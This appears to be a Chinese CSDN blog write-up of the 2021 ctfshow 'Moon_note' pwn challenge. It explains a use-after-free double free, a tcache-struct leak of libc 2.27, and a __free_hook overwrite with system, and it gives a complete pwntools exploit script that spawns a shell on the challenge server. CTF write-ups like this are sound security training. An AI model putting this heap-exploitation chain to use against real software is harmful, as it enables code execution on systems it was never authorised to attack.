2021 ctfshow 月饼杯 pwn Moon_note

最新推荐文章于 2023-03-28 21:45:27 发布
最新推荐文章于 2023-03-28 21:45:27 发布
阅读量255 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120399027
版权

在这里插入图片描述
保护全开,没给libc。
没给libc真可恶。

菜单
在这里插入图片描述

create
在这里插入图片描述设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。
chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。

write
在这里插入图片描述就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。
但是只能写一次。

show
在这里插入图片描述正常show

delete
在这里插入图片描述free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清理指针,造成uaf。那个指针可以重复使用,多次释放,可以double free。

思路是啥
首先我们需要知道libc的版本。
先尝试一次double free,看报不报错,或者报错类型,来看看libc版本是2.23 2.27还是2.29及以上。

因为2.23的话就会直接报double free。
2.29及以上会报tcache dup 2.

最后double free啥都不报,确定了2.27的版本,具体2。27那个版本一会试一试就清楚了。

再说解题,我们现在有double free,首要任务是泄露libc,但是我们的chunk只能申请到0x60大小,所以首先想到的是攻击tcache struct。所以首先就通过double free泄露heap地址,然后污染tcache struct,释放掉它,得到libc地址。

得到之后再怎么利用,常规来讲我们只需要利用double free去攻击free_hook就好啦。
但是因为tcache被污染了,我们只能提前申请好大小合适的chunk,然后free进入tcache,或者我这里利用的方法是tcache中有一个残留的指针,只需要提前留几个0x30的chunk,方便申请,就可以直接利用残留的指针攻击free_hook。

exp

from pwn import*

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']


#r = process("./moon")
r = remote("pwn.challenge.ctf.show", 28098)

elf = ELF("./moon")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./64/libc-2.27.so")

def add(title):
    r.sendlineafter("Choice: ", "1")
    r.sendlineafter("Title: ", title)
    
    
def edit(title, size, content):
    r.sendlineafter("Choice: ", "2")
    r.sendlineafter("write content: ", title)
    r.sendlineafter("Size of content: ", str(size))
    r.sendlineafter("Content: ", content)

def show(title):
    r.sendlineafter("Choice: ", "3")
    r.sendlineafter("show content: ", title)

def delete(title):
    r.sendlineafter("Choice: ", "4")
    r.sendlineafter("delete: ", title)

printf_got = elf.got['printf']

add("1")
edit("1", 0x30, "a")
delete("1")
add("1")
delete("1")

add("1")
show("1")
heap_addr = u64(r.recv(6) + '\x00\x00') - 0x280
print "heap_addr = " + hex(heap_addr)

add("0")
add("00")
add("000")
add("0000")
edit("0000", 0x10, "/bin/sh")

add("2")
edit("2", 0x50, "")
delete("2")
add("2")
delete("2")

add("3")
add("4")
edit("4", 0x50, p64(heap_addr))
add("5")
edit("5", 0x50, "aaaa")

add("6")
edit("6", 0x50, "a" * 64)
delete("6")

add("6")
show("6")
libc_base = u64(r.recvuntil("\x7f")[-6:] + '\x00\x00') - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
print "libc_base = " + hex(libc_base)

delete("0")

add("bbbb")
edit("bbbb", 0x30, p64(free_hook))


delete("00")
delete("000")

add("cccc")
edit("cccc", 0x30, p64(system_addr))

add("dddd")
edit("dddd", 0x30, p64(system_addr))

delete("0000")

r.sendline("cat flag")

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow刷题记录
bmth666的博客
01-13 2580
文章目录web_月饼杯web1_此夜圆web2_故人心web3_莫负婵娟WEB入门web55红包题第二弹web57 web_月饼杯 最近在ctfshow上看到了不少好题,来学一学,做一做 web1_此夜圆 题目直接给出了源码: <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname
CTFshow卷王杯 | just pwn
rencvn的划水
03-06 646
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow web 月饼
m0_62422842的博客
06-10 486
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
ctfshow 月饼杯(第二届) 部分WriteUp
mumuzi的博客
09-21 2691
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
2021 ctfshow 月饼pwn 简单的胖
yongbaoii的博客
09-24 251
显然就是一个简单的栈溢出,但是问题是还是不知道libc。 试了半天libc是2.27的,但是2.27的ibc又会有一个栈对齐的问题。 调试调试给它对齐就行。 有好几处需要栈对齐。 exp from pwn import* context.log_level = "debug" context.terminal = ['tmux', 'splitw', '-h'] r = process("yb1") elf = ELF("./yb1") libc = ELF("./64/libc-2.27.so..
ctf练习题
moon__________的博客
10-09 3495
攻防世界WEB-Challenge area -Web php include WEB-Challenge area -Web php include 代码审计可以轻松知道本题考查文件包含并且过滤的php:// 所以我们用data://伪协议来传输数据,成功执行phpinfo() http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?> 接下来我们利用大小写测试服务器操作系统(其实上图已
ctfshow吃瓜杯-签层饼、Tea_tube_pot
weixin_61154173的博客
03-28 219
发现如果if条件成立,则 dword_525A30 就为0,那看if条件,因为要求num1和num2,所以他们是唯一的,所以如果想要输出yeah!这个if条件一定成立,即num2正确的话,dword_525A30一定为0,所以关注点是如何求num1,num2。程序很简单,其中生成随机数的那部分代码并没有影响用户输入的值,所以可以不考虑,那倒着分析,看那个if分支。dword_525A30为0就可以输出yeah,那我们肯定想让他为0,点进去看看。对,num1,num2按热键x交叉引用。发现恒1,x交叉引用。
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN-PRACTICE-CTFSHOW-8
P1umH0的博客
01-18 1839
PWN-PRACTICE-CTFSHOW-8吃瓜杯-wuqian月饼杯II-简单的胖月饼杯II-容易的胖击剑杯-pwn01-My_sword_is_ready 吃瓜杯-wuqian 栈溢出,ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1") sy
CTF入门指南
baikeng3674的博客
02-05 5609
转自http://www.cnblogs.com/christychang/p/6032532.html ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web密码学pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据reverse 逆向windows...
ctfshow_2021月饼杯记录
MiGooli的博客
09-21 1680
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
2021 ctfshow 月饼pwn 容易的胖
yongbaoii的博客
09-24 200
保护啥也没有。 看起来似乎是就是一个输入shellcode的过程,但是往哪输入,然后输入进去咋样,题目怎么做,都暂时看不出来,所以需要我们去调试一下。 可以看出来shellcode被放在了0x804a040,这是一个bss上的地址。 我们可以看到,当我们通过’\x00’截断来绕过strcmp正常返回的时候,我们会把ebp-8,也就是v3地方的地址弹到ecx,然后控制了它就可以控制我们函数的返回地址,我们只要让它合适的返回到我们的shellcode上就好啦。 exp from pwn import* .
ctfshow-月饼杯WP
~airrudder~
09-27 4356
源码文件Baby(Don't)Cry.py: # -*- coding:utf-8 -*- #Author: Lazzaro from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return
CTFSHOW 36D杯CTF(pwn部分wp)
weixin_44296844的博客
05-04 1749
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 7921
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
ctfshowpwn2
最新发布
09-28
ctfshowpwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值